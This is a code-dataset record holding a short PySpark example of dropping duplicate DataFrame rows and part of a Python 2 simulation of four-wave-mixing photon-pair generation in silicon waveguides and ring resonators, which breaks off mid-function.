4dbb490667e510006a9631a51f82564848df9b9f | 18c699d61a7ead0c8d29efdddacd71468c227221 | /pyspark-distinct-to-drop-duplicates.py | 154bc0ea92950a02fb50fc46c18ec406f57704fb | [] | no_license | devs-93/Saprk-Common-Operation | 7847f009dca3466cd5a793bb81f1468e7ef6698b | b9ed874dcc8d059622bc63ef942925b1198c906d | refs/heads/main | 2023-08-28T09:39:15.355336 | 2021-11-12T10:19:21 | 2021-11-12T10:19:21 | 427,312,696 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,152 | py | import pyspark
from pyspark.sql import SparkSession
from pyspark.sql.functions import expr
spark = SparkSession.builder.appName('SparkByExamples.com').getOrCreate()
data = [("James1", "Sales1", 3000),
("James1", "Sales1", 3000),
("Michael", "Sales", 4600),
("Robert", "Sales", 4100),
("Maria", "Finance", 3000),
("James", "Sales", 3000),
("Scott", "Finance", 3300),
("Jen", "Finance", 3900),
("Jeff", "Marketing", 3000),
("Kumar", "Marketing", 2000),
("Saif", "Sales", 4100)
]
columns = ["employee_name", "department", "salary"]
df = spark.createDataFrame(data=data, schema=columns)
df.printSchema()
df.show(truncate=False)
# Distinct
distinctDF = df.distinct()
print("Distinct count: " + str(distinctDF.count()))
distinctDF.show(truncate=False)
# Drop duplicates
df2 = df.dropDuplicates()
print("Distinct count: " + str(df2.count()))
df2.show(truncate=False)
# Drop duplicates on selected columns
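# note: with a subset, Spark keeps one arbitrary row per distinct
# (department, salary) combination unless an ordering is imposed first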
dropDisDF = df.dropDuplicates(["department", "salary"])
print("Distinct count of department salary : " + str(dropDisDF.count()))
dropDisDF.show(truncate=False)
| [
"[email protected]"
] | |
52793a05086193090d0b2d2851abe1075600a7d7 | 649417ac89aa4917eeecf00ad7aa2d9ddaa15bf6 | /PhaseMatchingBiphotonFWM.py | b4c39e2c3123be323950df49fef38a7e65ef84ab | [] | no_license | damienbonneau/sources | 70bb514e384571f922b044306f6dfd81ac459bed | 60d0aa605bbd6f9e6ea30e4a369d12dd4ed1a83b | refs/heads/master | 2021-01-20T21:15:45.454573 | 2016-08-04T18:01:49 | 2016-08-04T18:01:49 | 64,950,261 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 54,609 | py | # -*- coding: utf-8 -*-
from numpy import *
import matplotlib as mpl
from matplotlib import cm,colors
import matplotlib.pyplot as plt
from matplotlib.ticker import MaxNLocator
from scipy.optimize import leastsq
import os,time
# -----------------------------------------------------------------------------#
# Plot functions
# -----------------------------------------------------------------------------#
# Lattice: bidimensional numpy array, example : lattice = ones((size, size), dtype=float )
# extent: axis extent for each axis [begin_x,end_x,begin_y,end_y]
def plotcolormap(lattice,extent,fname = None):
fig = plt.figure()
map1=colors.LinearSegmentedColormap.from_list('bla',['#000000','#FF0000','#FFFF00'])
begin_x,end_x,begin_y,end_y = extent
aspect = (end_x - begin_x )/(end_y - begin_y)
plt.imshow(lattice, map1,vmin = 0, interpolation='nearest',extent=extent,aspect = aspect)
plt.gca().xaxis.set_major_locator( MaxNLocator(nbins = 7, prune = 'lower') )
plt.gca().yaxis.set_major_locator( MaxNLocator(nbins = 6) )
#cbar = plt.colorbar()
#cbar.locator = MaxNLocator( nbins = 6)
# vmin=0,vmax = 1,
if fname is None:
plt.show()
else:
plt.savefig(fname)
plt.close()
def plot(plots):
for x,y,style in plots:
plt.plot(x, y, style) # x, y, 'k--',
plt.grid(True)
plt.title('')
plt.xlabel('')
plt.ylabel('')
plt.show()
def plotcolormapphase(lattice,extent):
fig = plt.figure()
map1=colors.LinearSegmentedColormap.from_list('bla',['#0000FF','#000000','#FF0000'])
plt.imshow(lattice, map1,vmin = -pi,vmax = pi, interpolation='nearest',extent=extent)
# vmin=0,vmax = 1,
plt.show()
# -----------------------------------------------------------------------------#
# MISC FUNCTIONS (helpers for classes)
# -----------------------------------------------------------------------------#
def funcpeak(lbda,lbda0):
T = 1.*10**(-9)
signu = 0.441/T
siglbda = signu/(c*10**6)*(lbda0)**2
return sqrt(1./(sqrt(2*pi)*siglbda) * exp(-(lbda-lbda0)**2/(2*siglbda**2)))
"""
input state as a 2D matrix
!! the input state is not given as a density matrix
it's a pure state given in a matrix
"""
def schmidtnumber(state):
N,M = state.shape
ror=zeros((N,N)) # reduced density matrix
for l in xrange(N):
for n in xrange(N):
for p in xrange(N):
ror[l,n]+=state[p,l]*state[p,n]
ror2 = dot(ror,ror)
# compute the trace of ror2
tmp = 0
for k in xrange(N):
tmp+= ror2[k,k]
schn = 1.0/tmp
return schn
def parse_extent(line):
l1 = line.split(":")[1]
l2 = l1.split(",")[0]
swlmin,swlmax = l2.split("-")
wlmin,wlmax = float(swlmin),float(swlmax)
return wlmin,wlmax
def parse_biphoton_data(line):
l1 = line.replace("\n","")
ls = l1.split(" ")
res = []
for e in ls:
res.append(float(e))
return array(res)
# -----------------------------------------------------------------------------#
# CONSTANTS
# -----------------------------------------------------------------------------#
I = 1.0j
HPLANCK = 6.626068*10**(-34) #m2 kg / s
HBAR = HPLANCK/(2*pi)
EPSILON0 = 8.85418782*10**(-12)#m-3 kg-1 s4 A2 or C.V-1.M-1
c = 299792458.0 # CLIGHT = 299792458. # m/s
n2_Si = 6.3* 10**(-18) # m2/W (Semicond. Sci. Technol. 23 (2008) 064007 (9pp))
# -----------------------------------------------------------------------------#
# CLASS Waveguide
# -----------------------------------------------------------------------------#
# Init (width, height):
# * Take the width and height of the waveguide cross section as parameters
# * Loads a file containing lbda vs neff
# * fits a dispersion curve to the data loaded
# This class has methods to obtain the effective index, the group index, and wave number when given a wavelength
#
class Waveguide(object):
def __init__(self,width,height):
self.rootname = "waveguide_data_noslab"
self.width = width
self.height = height
s = "%dx%d" % (width,height)
files = os.listdir(self.rootname)
for fname in files:
if fname.find(s) >=0:
self.__load__(fname)
self.__fit__()
# We fix the FWM effective area that we calculate using the overlap between the four fields
self.Aeff = 0.03 # um^2
def __load__(self,fname):
path = self.rootname+"\\"+fname
f = open(path)
line = f.readline()
lbdas = []
neffs = []
while(len(line))>0:
splitted = line.split("\t")
lbda,neff = splitted[0:2]
line = f.readline()
if lbda>0:
lbdas.append(float(lbda))
neffs.append(float(neff))
self.lbdas = array(lbdas)
self.neffs = array(neffs)
return
def __fit__(self):
p0 = [1,0,0,0]
plsqwl2n = leastsq(self.__residuals__, p0, args=(self.neffs, self.lbdas))
self.pwl2n = plsqwl2n[0] # wavelength to neff
#print self.p
def __func__(self,p,x):
d,c,b,a = p
return a*x**3+b*x**2+c*x+d
def __residuals__(self,p,y, x):
err = y-self.__func__(p,x)
return err
def getneff(self,lbda):
return self.__func__(self.pwl2n,lbda)
# lbda in um
def wl2kv(self,a_lbda):
return 2*pi*self.getneff(a_lbda)/(a_lbda) # the kvector z component is returned in um-1
def kv2wl(self,a_kv):
pass # not as easy ...
def plotneff(self):
x = arange(min(self.lbdas),max(self.lbdas),0.1)
plots = [(self.lbdas,self.neffs,"-"),(x,self.getneff(x),"-")]
plot(plots)
def getng(self,lbda):
lbda_step = 0.00001
lbda1 = lbda - lbda_step
lbda2 = lbda + lbda_step
neff1 = self.getneff(lbda1)
neff2 = self.getneff(lbda2)
neff = self.getneff(lbda)
ng = neff -lbda*(neff2-neff1)/(2*lbda_step)
return ng
# -----------------------------------------------------------------------------#
# CLASS FWM_Simu
# -----------------------------------------------------------------------------#
# This class calculates the joint spectral distribution obtained for a straight
# waveguide with a given set of parameters
# Init (
# * Waveguide cross section
# * Waveguide length (Meters)
# * Pump power (Watts)
# * Pump wavelength (um)
# * Pulse duration (Seconds)
# * Repetition rate (Hz)
# )
#
# computeJS: Does the simulation
#
class FWM_Simu(object):
def __init__(self,wg = Waveguide(550,220),
length = 0.03, # 0.03 ->3cm
pumppower = 0.1*10**-3,pumpwl = 1.55,pulseduration=1.*10**(-12),reprate = 40*10**6, N= 200
):
self.T = pulseduration # in seconds
self.wg = wg # waveguide crosssection (Waveguide object)
self.length = length # Propagation length in the waveguide
self.L = length
self.pumppower = pumppower # in W
#self.gamma = 3*10**2 # W^-1 m^-1 ; non linear coeff IEEE JOURNAL OF SELECTED TOPICS IN QUANTUM ELECTRONICS, VOL. 16, NO. 1, JANUARY/FEBRUARY 2010
self.lbda_p = pumpwl
#self.pumpenvelop(self.lbda_p)
self.pumpenvelop(pumpwl) # computes siglbda
self.gamma = 460. # 2*pi/(self.lbda_p*10**(-6))*n2_Si/(self.wg.Aeff*10**(-12)) #W-1 M-1
#print "Gamma", self.gamma
self.reprate = reprate # Hz
self.Epulse = self.pumppower/self.reprate #Energy per pulse in J
self.N = N
def setPumpwl(self,x):
self.lbda_p = x
def setPulseDuration(self,x):
self.T = x
self.pumpenvelop(self.lbda_p)
# Define phase matching function
def getdk(self,p1,p2,lbda_p1,lbda_p2,lbda_s,lbda_i):
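        # linear phase mismatch kp1 + kp2 - ks - ki reduced by the nonlinear
        # (self/cross phase modulation) contribution gamma*(P1 + P2); gamma
        # is converted from W-1 m-1 to W-1 um-1 to match the k vectors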
kp1,kp2,ki,ks = map(self.wg.wl2kv,[lbda_p1,lbda_p2,lbda_i,lbda_s])
ga = self.gamma*10**(-6) # to put gamma in um
dk = kp1+kp2-ks-ki-ga*(p1+p2) # When putting gamma, the phase matching bandwidth changes dramatically
return dk
# **************
# Pump envelopes
# **************
def pumpenvelop(self,lbda):
return self.gaussppumpenvelop(lbda) #self.gaussppumpenvelop(lbda)
#return self.rectpumpenvelop(lbda) #self.gaussppumpenvelop(lbda)
def toplotCWGain(self,lbda_s = arange(1.5,1.6,0.0001)):
lbda_i = 1./(2/self.lbda_p-1/lbda_s)
a_dk = self.getdk(0,0,self.lbda_p,self.lbda_p,lbda_s,lbda_i) # um-1
a_phasematching = sinc(self.length*10**6/2*a_dk)
return a_phasematching**2
def gausspulsedpumpenvelop(self,lbda,dlbda = 0.4*10**(-4)):
return self.gaussppumpenvelop(lbda) *(sin(2*pi*(lbda)/dlbda))**2# From laser textbook
def rectpumpenvelop(self,lbda):
signu = 0.441/self.T # self.linewidth #0.441/sigma_t # From laser book, in Hz
sigomega = 2*pi*signu
lbda0 = self.lbda_p
siglbda = signu/(c*10**6)*(lbda0)**2
w = sqrt(2*pi)*siglbda
self.siglbda = siglbda
a = 1/sqrt(w)
lbda_min = lbda0-w/2
lbda_max = lbda0+w/2
#print "lbdas", lbda_min,lbda_max
step = w / 400
self.pumprange = arange(lbda_min,lbda_max,step)
#print "min ", lbda_min,lbda[0]
#print "max ", lbda_max,lbda[-1]
output = (lbda>=lbda_min)*(lbda<=lbda_max)*a
#if type(lbda) == type(zeros(5)):
# print min(lbda),lbda_min,lbda_max,max(lbda)," ---> ", output.sum()
return output
def gaussppumpenvelop(self,lbda):
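        # Gaussian amplitude envelope in wavelength, normalised so the
        # squared amplitude integrates to 1 over lambda; sigma is derived
        # from the 0.441 time-bandwidth product of a transform-limited
        # Gaussian pulse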
lbda0 = self.lbda_p
k0,k = map(self.wg.wl2kv,[lbda0,lbda])
signu = 0.441/self.T # self.linewidth #0.441/sigma_t # From laser book, in Hz
sigomega = 2*pi*signu
siglbda = signu/(c*10**6)*(lbda0)**2
ng = self.wg.getng(lbda0)
sigk = siglbda/(lbda0)**2*2*pi*ng
self.siglbda = siglbda
omega0 = 2*pi*c/lbda0
omega = 2*pi*c/lbda
#return exp(-2*log(2)*((lbda0-lbda)*10**-6)**2/(siglbda**2)) # From laser textbook
return sqrt(1./(sqrt(2*pi)*siglbda) * exp(-(lbda-lbda0)**2/(2*siglbda**2))) # this gauss envelop is on lambda which is probably not very physical ...
#return sqrt(1./(sqrt(2*pi)*sigomega) * exp(-(omega-omega0)**2/(2*sigomega**2)))*sqrt(2*pi*c)/lbda
# Rectangular pulse in the temporal domain
# lbda in um
# T : pulse length [S]
def sincpumpenvelop(self,lbda):
T = self.T
om = 2*pi*c/(lbda*10**-6)
om0 = 2*pi*c/(self.lbda_p*10**(-6))
dom = om - om0
#return sinc(dom*T/2) * sqrt(T/(2*pi)) # this normalization works when integrating over omega
# *** WARNING, in python, sinc(x) = sin(pi*x)/(pi*x) which is already normalized to one ! ***
return sinc(dom*T/2) * sqrt(T*pi*c*10**6/(lbda**2)) # c in um/s, lbda in um, T in s; this normalization is for lambda
# **************
#
# **************
# This provides the range of lbdas which should be used to accurately span the pump
def updatepumprange(self):
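        # widen the window by doubling deltalbda until it captures at least
        # 95% of the pump energy, then return it sampled on a 400-point grid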
print "Get pump range ..."
lbda_p = self.lbda_p
lbda_step= 0.00000001 # step for finding the pump range
P = 0.
targetfraction = 0.95
deltalbda = 0.5*10**(-6) # initialize deltalbda at 1pm
while (P<targetfraction):
deltalbda = 2*deltalbda
lbdas = arange(lbda_p-deltalbda,lbda_p+deltalbda,lbda_step)
#print P
P=(self.pumpenvelop(lbdas)*self.pumpenvelop(lbdas).conjugate()).sum()*lbda_step
print P
print P
N = 400
step = (lbdas[-1]-lbdas[0])/N # Step for the returned pump range
res = arange(lbdas[0],lbdas[-1],step)
#print "Size of pump lbdas" ,lbdas.size
#print self.pumpenvelop(lbda_p)
print "Pump range : (um)",lbdas[0],lbdas[-1]
self.pumprange = res
return res
def setRangeJS(self,lbda_s_min,lbda_s_max,lbda_i_min,lbda_i_max):
self.lbda_s_min = lbda_s_min
self.lbda_s_max = lbda_s_max
self.lbda_i_min = lbda_i_min
self.lbda_i_max = lbda_i_max
self.extent = [x*1000 for x in [self.lbda_i_min,self.lbda_i_max,self.lbda_s_min,self.lbda_s_max]] # um to nm
print self.extent
def setRangeScanResonance(self,lbda_s_min,lbda_s_max):
# Get the range for signal centered on the resonance
lsm,lsM = lbda_s_min,lbda_s_max
# Get the range for idler using rough energy conservation
lp = self.lbda_p
lp_min = min(self.pumprange)
lp_max = max(self.pumprange)
lim = 1./(2./lp_min - 1./lsM)
liM = 1./(2./lp_max - 1./lsm)
print "avg_pumps", (lim+lsm)/2,(liM+lsM)/2
#print "%.2f %.2f ; %.2f %.2f (pm)" % (lsm*10**6,lsM*10**6,lim*10**6,liM*10**6)
print lsm,lsM,lim,liM
self.setRangeJS(lsm,lsM,lim,liM)
def computeJS_old(self,begin=1.545,end=1.555): # begin=1.545,end=1.555,step=0.0001
#size = int((end-begin)/step)
size = self.N
step = (end-begin) / self.N
P = self.pumppower
L = self.length
lattice = ones((size, size), dtype=float )
phases = ones((size, size), dtype=float )
for i in xrange(size):
print i
lbda_i = i*step+begin
for j in xrange(size):
lbda_s = j*step+begin
a_lbda_p1 = self.pumprange
a_lbda_p2 = 1./(1/lbda_s+1/lbda_i-1/a_lbda_p1)
a_p1 = P*self.pumpenvelop(a_lbda_p1) # pump amplitude 1
a_p2 = P*self.pumpenvelop(a_lbda_p2) # pump amplitude 2
a_dk = self.getdk(a_p1,a_p2,a_lbda_p1,a_lbda_p2,lbda_s,lbda_i)
a_phasematching = 1
a_expi = 1
#a_phasematching = sinc(L/2*a_dk)
a_expi = exp(I*L/2*a_dk)
a_res = a_phasematching*a_expi*a_p1*a_p2
res = a_res.sum()*a_res.size*step
lattice[i,size-1-j]= sqrt(abs(res.real**2+res.imag**2)) #res res #
phases[i,size-1-j] = angle(res)
#N = sqrt((lattice*conjugate(lattice)).max())
#lattice = lattice/N
self.lattice = lattice
self.phases = phases
self.extent = [begin*1000,end*1000,begin*1000,end*1000]
Z = lattice.sum()# sqrt(abs(lattice*conjugate(lattice)).sum())
self.normlattice = sqrt(abs(lattice/Z))
# Override these methods to add custom filters on signal and idler arm
def filter_idler(self,lbda):
return ones(lbda.size)
def filter_signal(self,lbda):
return ones(lbda.size)
def getPurityAfterFilter(self):
Ni = self.Ni
Ns = self.Ns
# Apply custom filters:
m_filter_signal =zeros((Ni,Ns))
m_filter_idler =zeros((Ni,Ns))
for i in arange(Ni):
m_filter_signal[i,:] = self.filter_signal(self.a_lbda_s)
for j in arange(Ns):
m_filter_idler[:,j] = self.filter_idler(self.a_lbda_i)
lattice = self.normlattice*m_filter_signal*m_filter_idler
# Multiply by the appropriate missing constants
Z = lattice.sum()# sqrt(abs(lattice*conjugate(lattice)).sum())
normlattice = sqrt(abs(lattice/Z))
self.normlattice_unfiltered = self.normlattice[:,:] # Save the previous matrix
self.normlattice = normlattice # assign the new filtered matrix
purity = self.computeHeraldedPhotonPurity() # computes the purity after filtering
self.normlattice = self.normlattice_unfiltered # restore the previous matrix
return purity
def computeJS(self):
P = self.pumppower
L = self.L # Cavity length
N = self.N
lbda_s_min = self.lbda_s_min
lbda_s_max = self.lbda_s_max
lbda_i_min = self.lbda_i_min
lbda_i_max = self.lbda_i_max
step_i = (lbda_i_max-lbda_i_min)/N
step_s = (lbda_s_max-lbda_s_min)/N
a_lbda_i = arange(lbda_i_min,lbda_i_max,step_i)[0:N]
a_lbda_s = arange(lbda_s_min,lbda_s_max,step_s)[0:N]
self.a_lbda_i = a_lbda_i
self.a_lbda_s = a_lbda_s
Ni = a_lbda_i.size
Ns = a_lbda_s.size
print Ni, Ns
self.Ni = Ni
self.Ns = Ns
self.step_i = step_i
self.step_s = step_s
rangepump = self.pumprange
M = rangepump.size
dlbda_pump = (rangepump.max()-rangepump.min())/M
lattice = zeros((Ni,Ns))
a_lbda_p1 = rangepump
a_p1 = self.pumpenvelop(a_lbda_p1) # pump amplitude 1
ng = self.wg.getng(self.lbda_p)
print "Steps" ,step_i,step_s
#dbgpm = 0.
pumpmax = self.pumpenvelop(self.lbda_p)
phases = zeros((Ni,Ns))
print max(a_p1)
for j in xrange(Ns):
            #print j
lbda_s = a_lbda_s[j] # lbda_s_min+j*step_s
for i in xrange(Ni):
lbda_i = a_lbda_i[i] # lbda_i_min+i*step_i
a_lbda_p2 = 1./(1./lbda_s+1./lbda_i-1./a_lbda_p1)
a_p2 = self.pumpenvelop(a_lbda_p2) # pump amplitude 2
#print a_lbda_p2[0],a_lbda_p2[-1]," ---> ", a_p2.sum()
#print max(a_p2)
# In order to save computation time we can take a_pm = 1. for small cavities
a_dk = 1.
a_pm = 1.
#a_dk = self.getdk(P*a_p1*conjugate(a_p1),P*a_p2*conjugate(a_p2),a_lbda_p1,a_lbda_p2,lbda_s,lbda_i)
#a_pm = sinc(L/2*a_dk/pi) # the L will be added later in the global constant
a_res = a_p1*a_p2*a_pm
a_res = a_res * a_lbda_p2/a_lbda_p1
# Multiply by the dlambda;
# The pump function is i um^(-1/2), dlbda_pump is in um
a_res = a_res*dlbda_pump
res = a_res.sum() # unitless
#res = res
# Multiply by the dlambda
# Since the formula was derived for domega, we have to remember that domega = -2*pi*c/lbda**2 * dlbda
lattice[i,Ns-1-j]= abs(res.real**2+res.imag**2)* (step_i/(lbda_i**2)) * (step_s/(lbda_s**2))
#print angle(res)
phases[i,Ns-1-j] = angle(res)
# Check what should be the proper formula which keeps the joint spectral amplitude instead of joint spectral probability distribution
# Apply custom filters:
# m_filter_signal =zeros((Ni,Ns))
# m_filter_idler =zeros((Ni,Ns))
# for i in arange(Ni):
# m_filter_signal[i,:] = self.filter_signal(a_lbda_s)
# for j in arange(Ns):
# m_filter_idler[:,j] = self.filter_idler(a_lbda_i)
# lattice = lattice*m_filter_signal*m_filter_idler
# Multiply by the appropriate missing constants
lattice = lattice*(c*self.Epulse*self.gamma*(self.L))**2/(2*pi**2) #/ (2*pi*ng)
Z = lattice.sum()# sqrt(abs(lattice*conjugate(lattice)).sum())
self.normlattice = sqrt(abs(lattice/Z))
self.lattice = lattice
self.phases = phases
def plotBiphoton(self,fname = None):
plotcolormap(self.lattice,self.extent,fname)
def __g__(self,i,j):
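        # g(i,j) = sum_k psi(i,k) psi*(j,k) with psi = normlattice*exp(i*phases):
        # an element of the heralded photon's reduced density matrix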
#return (self.normlattice[i,:]*conjugate(self.normlattice[j,:])).sum()
return (self.normlattice[i,:]*exp(I*self.phases[i,:])*conjugate(self.normlattice[j,:]*exp(I*self.phases[j,:]))).sum()
def __g_nophase__(self,i,j):
return (self.normlattice[i,:]*conjugate(self.normlattice[j,:])).sum()
def __G_nophase__(self,i,j,k,l):
return self.__g_nophase__(i,j)*self.__g_nophase__(k,l)
vectg = vectorize(__g__)
def __G__(self,i,j,k,l):
return self.__g__(i,j)*self.__g__(k,l)
vectG = vectorize(__G__)
vectG_nophase = vectorize(__G_nophase__)
# Purity = Tr(ro**2)
def computenaivepurity(self):
lattice = sqrt(self.normlattice)
N = self.N
P = 0
for n in xrange(self.N):
for m in xrange(self.N):
P+= (lattice[:,n]*conjugate(lattice[:,m])).sum()*(lattice[:,m]*conjugate(lattice[:,n])).sum()
self.purity = abs(P)
self.schn = 1./P
return P
# Computes the probability of getting coincidences between two heralded photons from different sources
def computePcoincfrom2photons(self):
lattice = sqrt(self.normlattice)
#print "State Norm:", abs(lattice*conjugate(lattice)).sum() # equivalent to the trace
print "Computing proba coincidence"
N = self.N
omega1 = zeros((N,N))
omega2 = zeros((N,N))
for i in range(N):
omega1[:,i]= arange(N)
omega2[i,:]= arange(N)
Gnnmm = self.vectG(self,omega1,omega1,omega2,omega2)
Gnmmn = self.vectG(self,omega1,omega2,omega2,omega1)
print "Gnnmm: ",Gnnmm.sum()
print "Gnmmn: ",Gnmmn.sum()
Pcoinc = 0.5*(Gnnmm.sum()-Gnmmn.sum()) # See proof in my labbook from 2012 (27/01/2012)
print "Pcoinc: ",Pcoinc
print "Visibility: ", 1.-Pcoinc/0.5
self.visibility= 1.-Pcoinc/0.5
return 1.-Pcoinc/0.5
def computeHeraldedPhotonPurity(self):
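        # purity = Tr(rho_reduced^2), evaluated as the sum of G(w1,w2,w2,w1);
        # the Schmidt number is its inverse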
#self.computePcoincfrom2photons()
lattice = self.normlattice
N = self.N
omega1 = zeros((N,N))
omega2 = zeros((N,N))
for i in range(N):
omega1[:,i]= arange(N)
omega2[i,:]= arange(N)
#print "State Norm:", abs(lattice*conjugate(lattice)).sum() # equivalent to the trace
purity = self.vectG(self,omega1,omega2,omega2,omega1).sum()
#purity2 = self.vectG_nophase(self,omega1,omega2,omega2,omega1).sum()
# print "Purity: ", purity,purity2
self.purity = abs(purity)
self.schn = 1/purity
"""
print "Computing heralded photon purity"
N = self.N
omega1 = zeros((N,N))
omega2 = zeros((N,N))
for i in range(N):
omega1[:,i]= arange(N)
omega2[i,:]= arange(N)
x = self.vectg(self,arange(N),arange(N))
print "Tr_ro1: ",x.sum()
g12 = self.vectg(self,omega1,omega2)
purity = (g12*g12).sum() # no dot product here, the formula (g12*g12).sum() provides exactly the trace over
# the reduced density matrix squared.
#print schn, schmidtnumber(lattice)
"""
return abs(purity)
###
# -----------------------------------------------------------------------------#
# CLASS FWM_RingSimu
# -----------------------------------------------------------------------------#
# This class calculates the joint spectral distribution obtained in a ring
# resonator for a given set of parameters
# Init (
# * Waveguide cross section
# * Waveguide length (Meters)
# * Pump power (Watts)
# * Pump wavelength (um)
# * Pulse duration (Seconds)
# * Repetition rate (Hz)
# * N: grid sampling (the JSA is stored in a NxN grid)
# * r: ring coupling (r = 1 means no coupling, while r = 0 means full coupling)
# * tau: round trip transmission which accounts for the loss in the ring resonator
# )
#
# setPumpToClosestRes(lambda) : Sets the pump to the closest resonance to the given wavelength
# setRangeScanResonance(p) : Sets the resonance to be used for collecting the idler photon. p is the resonance number.
# p = 0 is the same as the pump resonance
# p = +1 or -1 are the next nearest resonance to the pump
# p = +M or -M ....
#
# plotcavityresponse() : Shows the transmission spectrum of the cavity
# computeJS() : Does the simulation
#
# applycavity(lambda) : This is the function which applies the cavity. By default, this function applies a ring resonator.
# Different cavities can however be used.
# save(filename) : Saves the result of the simulation including all the parameters, the full state, and the derived parameters such as the Schmidt number
#
class FWM_RingSimu(FWM_Simu):
def __init__(self,wg = Waveguide(550,220),
length = 80., # um
pumppower = 45.*10**-3,pumpwl = 1.55,pulseduration=1.*10**(-12),N = 200,r = 0.98,tau = 1.0): # 300*10**3 -> 300 kHz linewidth
FWM_Simu.__init__(self,wg = wg,
length = length, # 0.03 ->3cm
pumppower = pumppower,pumpwl = pumpwl,pulseduration=pulseduration)
self.lbda_p = pumpwl # in um # We take the cavity resonance wavelength equal to the pump central wavelength
self.mpump = -1 # resonance number closest to the pump
# Ring parameters
self.L = length # Length of the ring in um
self.r = r
self.tau = tau # tau = 1. -> No loss
#self.tau = self.r # critical coupling
self.N = N
self.lattice = zeros((N,N))
# For loading purpose : Params
self.purity = -1
self.schn = -1
self.geneeff = -1
self.setters = {"Purity" : self.__setPurity__,
"Schmidt number" : self.__setSchn__,
"r" : self.__setr__,
"Nb pairs per pulse" : self.__setgeneeff__,
"Pulse duration (ps)" : self.__setT__ ,
"N" : self.__setN__,
}
self.resonancenumber = 0 # Resonance scanned for signal
# Setters when loading
def __setPurity__(self,x):
self.purity = x
def __setSchn__(self,x):
self.schn = x
def __setr__(self,x):
self.r = x
def __setgeneeff__(self,x):
self.geneeff = x
def __setT__(self,x):
self.T = x
def __setN__(self,x):
self.N = x
self.lattice = zeros((x,x))
self.phases = zeros((x,x))
def setTau(self,x):
self.tau = x
def setr(self,x):
self.r = x
def setL(self,L):
self.L = L
def ring(self,lbda):
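        # intra-cavity field build-up of an all-pass ring:
        # i*t / (1 - r*tau*exp(i*k*L)), with r the self-coupling, t the
        # cross-coupling and tau the round-trip amplitude transmission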
k = self.wg.wl2kv(lbda)
t = sqrt(1-self.r**2)
tau = self.tau
r = self.r
return I*t/(1-tau*r*exp(I*k*self.L))
def cavity_transmission(self,lbda):
t = sqrt(1-self.r**2)
return self.r+I*t*self.ring(lbda)
# Override these methods to add custom filters on signal and idler arm
def filter_idler(self,lbda):
return ones(lbda.size)
def filter_signal(self,lbda):
return ones(lbda.size)
# If using two coupled rings
def set_r2(self,r2 = 0.999):
self.r2 = r2
def CROW2(self,lbda):
k = self.wg.wl2kv(lbda)
r2 = self.r2
t2 = sqrt(1-r2**2)
r1 = self.r
t1 = sqrt(1-r1**2)
tau = self.tau
L1 = self.L
L2 = L1
g1 = tau*exp(I*L1*k)
g2 = tau*exp(I*L2*k)
return I*t1*(r2-g2)/(1-r2*g2+r1*g1*(g2-r2))
def applycavity(self,lbda):
return self.ring(lbda)
# Returns the closest cavity resonance for a given lambda and the resonance number
def getClosestCavityRes(self,lbda):
m = round(self.wg.wl2kv(lbda)*self.L/(2*pi))
kp0 = m*2*pi/self.L # target pump propagation constant
# The problem is now to get lbda0 from kp0
# We start approximating the neff of lbda0 using the one of lambda
neff = self.wg.getneff(lbda)
# Using a scipy optimize method could be more robust and faster than the following code
lbda0 = 2*pi*neff/kp0
print lbda0
lbdastep = 1*10**(-7) * sign(lbda0-lbda)
kp = self.wg.wl2kv(lbda0)
err = (kp-kp0)/kp0
while(abs(err)>0.0000001):
lbda0 += lbdastep
kp = self.wg.wl2kv(lbda0)
newerr = (kp-kp0)/kp0
if newerr**2>err**2:
lbdastep = lbdastep*(-1)
err = newerr
return lbda0,m
# Centers the pump on the closest cavity resonance
def setPumpToClosestRes(self,lbda):
self.lbda_p,self.mpump = self.getClosestCavityRes(lbda)
print "Pump is set at %.7f um" % self.lbda_p
# Get the range to scan for signal for the nth resonance with respect to the pump
# Rq : The pump should have been set such that mpump has a meaningful value
def getSignalRange(self,n):
FWHM = (1-self.r*self.tau)*self.lbda_p**2/(self.wg.getng(self.lbda_p)*sqrt(2)*pi*self.L)
print "FWHM (um) : ",FWHM
fullrange = 5*FWHM #
wlFSR = self.lbda_p**2/(self.L*self.wg.getng(self.lbda_p)) # FSR in lambda
print "FSR (um) : ",wlFSR
lbda_s,m = self.getClosestCavityRes(self.lbda_p+n*wlFSR)
print "Resonance (um) : ",lbda_s
return lbda_s-fullrange/2,lbda_s+fullrange/2
def plotcavityresponse(self,albda = arange(1.5477-0.01,1.5477+0.01,0.0000001)):
cavity = self.applycavity(albda)*self.applycavity(albda).conjugate()
pump = self.pumpenvelop(albda)**2
lbda_i,m_i = self.getClosestCavityRes(1.548)
lbda_s = 1./(2./self.lbda_p-1./lbda_i)
signal_wl = funcpeak(albda,lbda_s)
idler_wl = funcpeak(albda,lbda_i)
plot([(albda,cavity,"-"),
(albda,pump/pump.max()*cavity.max(),"-"),
(albda,signal_wl/signal_wl.max()*cavity.max(),"r-"),
(albda,idler_wl/idler_wl.max()*cavity.max(),"r-")
]) # Plot the pump normalised wrt the biggest field enhancement
def setRangeJS(self,lbda_s_min,lbda_s_max,lbda_i_min,lbda_i_max):
self.lbda_s_min = lbda_s_min
self.lbda_s_max = lbda_s_max
self.lbda_i_min = lbda_i_min
self.lbda_i_max = lbda_i_max
def setRangeScanResonance(self,m):
# Get the range for signal centered on the resonance
lsm,lsM = self.getSignalRange(m)
self.resonancenumber = m
# Get the range for idler using rough energy conservation
lp = self.lbda_p
lim = 1./(2./lp - 1./lsM)
liM = 1./(2./lp - 1./lsm)
#print "%.2f %.2f ; %.2f %.2f (pm)" % (lsm*10**6,lsM*10**6,lim*10**6,liM*10**6)
print lsm,lsM,lim,liM
self.setRangeJS(lsm,lsM,lim,liM)
def updatepumprange(self):
print "Get pump range ..."
lbda_p = self.lbda_p
print lbda_p
lbda_step= 0.00000001 # step for finding the pump range
P = 0.
targetfraction = 0.95
deltalbda = 0.5*10**(-6) # initialize deltalbda at 1pm
while (P<targetfraction):
deltalbda = 2*deltalbda
lbdas = arange(lbda_p-deltalbda,lbda_p+deltalbda,lbda_step)
#print P
P=(self.pumpenvelop(lbdas)*self.pumpenvelop(lbdas).conjugate()).sum()*lbda_step
print P
print P
N = 400
# get cavity range
# If the pump is broader than the cavity, then we should chop the pump to the cavity region such that the grid is fine enough in the cavity
# If the pump is narrower than the cavity, then keep pump range
lsm,lsM = self.getSignalRange(0)
rl = lsM-lsm
lsm = lsm-rl/2
lsM = lsM+rl/2
lbdamax = min(lbdas[-1],lsM)
lbdamin = max(lbdas[0],lsm)
step = (lbdamax-lbdamin)/N # Step for the returned pump range
